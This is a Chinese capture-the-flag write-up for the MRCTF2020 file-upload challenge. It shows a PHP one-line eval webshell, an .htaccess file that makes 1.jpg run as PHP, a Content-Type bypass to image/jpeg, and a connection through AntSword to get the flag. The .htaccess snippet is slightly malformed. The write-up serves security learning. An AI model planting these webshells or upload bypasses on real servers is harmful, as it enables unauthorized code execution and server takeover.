(.htaccess文件特性)[MRCTF2020]你传你呢 1

题目环境:

不难看出是一道文件上传漏洞

上传一句话木马文件

burpsuite进行抓包
<?php @eval($_POST['shell']);?>

命名为PHP文件格式

Repeater进行重放

尝试了其它后缀进行绕过都没有成功

通过 application/x-php内容类型,可以看出被识别出是PHP文件,猜测作者使用了htaccess文件更改了相关配置

了解.htaccess文件

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名 、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

注意这几个字"改变文件扩展名",后面会用到

尝试传入jpg文件(一句话木马不变)

回显结果是否会有所不同

发现上传成功

访问上传的文件

图片加载失败

到这里猜想使用中国蚁剑是连接不成功的

不过咱们还是按照正常程序走一遍比较好

使用中国蚁剑进行连接

返回数据为空

到这里我们的一句话木马并没有被识别出来,或者说并没有执行,猜测被拦截

尝试上传更改后的.htaccess文件

上传.htaccess文件

php 复制代码
<FileMatch "1.jpg>
SetHandler application/x-httpd-php
</FileMatch>

上传的一句话木马文件要和1.jpg文件名一模一样

可以把这段代码理解为,将1.jpg文件内容当作PHP文件执行

发现被拦截了,更改内容类型为image/jpeg进行绕过

更改Content-Type内容类型为:image/jpeg

.htaccess文件上传成功

再次上传1.jpg的木马文件

上传成功

访问成功

尝试使用蚁剑进行连接

使用中国蚁剑进行连接



得到flag:
flag{11711c03-702e-43ac-b1fe-fec6c5297260}

相关推荐
Whoami!2 分钟前
❽⁄₁ ⟦ OSCP ⬖ 研记 ⟧ 修改漏洞利用脚本 ➱ 缓冲区 & 栈结构
网络安全·信息安全·漏洞利用·缓冲区溢出
毕设源码-朱学姐4 分钟前
【开题答辩全过程】以 基于SpringBoot的流行音乐网站的设计与实现为例,包含答辩的问题和答案
java·spring boot·后端
catchadmin5 分钟前
现代高效 PHP 开发的最佳实践
开发语言·后端·php
jiayong237 分钟前
Spring 框架完全指南
java·后端·spring
CoderJia程序员甲7 分钟前
GitHub 热榜项目 - 日榜(2025-12-5)
ai·开源·大模型·github·ai教程
AnAnCode8 分钟前
【时间轮算法-实战】Java基于Netty的 `HashedWheelTimer`快速搭建时间轮算法系统
java·开发语言·算法·时间轮算法
CesareCheung10 分钟前
用python写一个websocket接口,并用jmeter压测websocket接口
python·websocket·jmeter
白帽子黑客杰哥15 分钟前
零基础系统学习渗透测试:2025年详尽路线图
网络安全·就业·护网行动·网络安全工程师·实战演练·报班
liu****18 分钟前
12.C语言内存相关函数
c语言·开发语言·数据结构·c++·算法
扣脚大汉在网络33 分钟前
CVE-2025-55182 React反序列化漏洞复现
网络安全